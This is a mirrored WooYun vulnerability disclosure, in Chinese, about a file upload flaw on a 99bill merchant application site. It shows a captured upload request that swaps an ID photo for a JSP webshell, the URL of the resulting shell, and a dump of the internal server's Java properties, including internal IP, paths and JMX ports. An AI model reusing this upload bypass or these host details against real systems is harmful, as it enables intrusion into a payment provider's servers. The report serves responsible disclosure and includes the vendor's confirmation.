乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-16: 细节已通知厂商并且等待厂商处理中 2016-05-17: 厂商已经确认,细节仅向厂商公开 2016-05-27: 细节向核心白帽子及相关领域专家公开 2016-06-06: 细节向普通白帽子公开 2016-06-16: 细节向实习白帽子公开 2016-07-01: 细节向公众公开
快钱某站上传Getshell 入内网
上传点
https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&[email protected]
上传证件照片时抓包图片直接选择jsp shell
POST /nspwebsite/common/nsp/applyBuy.do?method=uploadPic HTTP/1.1Host: ipos.99bill.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: https://ipos.99bill.com/nspwebsite/common/nsp/merchant_process02.do?productId=1&corpName=e3gew&licenceNo=agwegawega&[email protected]Cookie: JSESSIONID=D5DDB0B8E8F182523A54BFBE1DD0A61D.tomcatServer456-3Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------3238940103786Content-Length: 7326-----------------------------3238940103786Content-Disposition: form-data; name="picF"; filename=".jsp
成功get shell一句话
shell:
https://ipos.99bill.com/nspwebsite/common/nsp/file/20160516154400407_.jsp
内网
java.vendor Sun Microsystems Inc.sun.java.launcher SUN_STANDARDcatalina.base /opt/oracle/tomcat/t-3sun.management.compiler HotSpot 64-Bit Tiered Compilerscatalina.useNaming trueapp.path.prefix /nfs/war//tomcatos.name Linuxsun.boot.class.path /opt/oracle/soft/jdk1.6.0_29/jre/lib/resources.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/rt.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/sunrsasign.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/jsse.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/jce.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/charsets.jar:/opt/oracle/soft/jdk1.6.0_29/jre/lib/modules/jdk.boot.jar:/opt/oracle/soft/jdk1.6.0_29/jre/classesjava.util.logging.config.file /opt/oracle/tomcat/t-3/conf/logging.propertiescom.sun.management.jmxremote java.vm.specification.vendor Sun Microsystems Inc.java.runtime.version 1.6.0_29-b11app.context nspwebsiteheapBin /opt/log/tomcat/3-nspwebsite/dump/heap.hprof.`date +"%Y-%m-%d_%H-%M-%S"`app.war.name nspwebsite.warhttps.port 8043user.name oracleshared.loader ${catalina.home}/shared,${catalina.home}/shared/lib,${catalina.home}/shared/lib/*.jartomcat.util.buf.StringCache.byte.enabled truejava.naming.factory.initial org.apache.naming.java.javaURLContextFactorygcLog /opt/log/tomcat/3-nspwebsite/gc/gc.log.`date +"%Y-%m-%d_%H-%M-%S"`user.language ensun.boot.library.path /opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64shutdown.port 10003http.port 8083java.version 1.6.0_29java.util.logging.manager org.apache.juli.ClassLoaderLogManageruser.timezone PRCallowStart truesun.arch.data.model 64java.endorsed.dirs /opt/oracle/tomcat/t-3/endorsedjava.rmi.server.randomIDs truesun.cpu.isalist sun.jnu.encoding UTF-8file.encoding.pkg sun.iopackage.access sun.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.,sun.beans.file.separator /java.specification.name Java Platform API Specificationjava.class.version 50.0user.country USjava.home /opt/oracle/soft/jdk1.6.0_29/jrejava.vm.info mixed modeos.version 2.6.32-504.16.2.el6.x86_64jmx.port 6903ajp.port 8013com.sun.management.jmxremote.ssl falsepath.separator :java.vm.version 20.4-b02java.awt.printerjob sun.print.PSPrinterJobgroup sun.io.unicode.encoding UnicodeLittlecom.sun.management.jmxremote.authenticate truepackage.definition sun.,java.,org.apache.catalina.,org.apache.coyote.,org.apache.tomcat.,org.apache.jasper.java.naming.factory.url.pkgs org.apache.naminguser.home /home/oraclejava.specification.vendor Sun Microsystems Inc.java.library.path /opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64/server:/opt/oracle/soft/jdk1.6.0_29/jre/lib/amd64:/opt/oracle/soft/jdk1.6.0_29/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/libjava.vendor.url http://java.sun.com/java.vm.vendor Sun Microsystems Inc.common.loader ${catalina.base}/lib,${catalina.base}/lib/*.jar,${catalina.home}/lib,${catalina.home}/lib/*.jarjava.runtime.name Java(TM) SE Runtime Environmentsun.java.command org.apache.catalina.startup.Bootstrap startjava.class.path /opt/oracle/tomcat/t-3/bin/bootstrap.jar:/opt/oracle/tomcat/t-3/bin/tomcat-juli.jarapp.log.path /opt/logtomcat.working.group com.sun.management.jmxremote.access.file ../shared/conf/jmxremote.accessjava.vm.specification.name Java Virtual Machine Specificationjava.vm.specification.version 1.0catalina.home /opt/oracle/tomcat/t-3sun.cpu.endian littlesun.os.patch.level unknownjava.io.tmpdir /opt/oracle/tomcat/t-3/tempjava.vendor.url.bug http://java.sun.com/cgi-bin/bugreport.cgiserver.loader java.rmi.server.hostname 172.21.151.134jvmRouteName tomcatServer456-3os.arch amd64java.awt.graphicsenv sun.awt.X11GraphicsEnvironmentjava.ext.dirs /opt/oracle/soft/jdk1.6.0_29/jre/lib/ext:/usr/java/packages/lib/extuser.dir /opt/oracle/tomcat/t-3/binline.separator java.vm.name Java HotSpot(TM) 64-Bit Server VMfile.encoding UTF-8com.sun.management.jmxremote.password.file ../shared/conf/jmxremote.passwordjava.specification.version 1.6
危害等级:中
漏洞Rank:10
确认时间:2016-05-17 08:57
感谢您对快钱的关注,我们将立刻安排修复!
暂无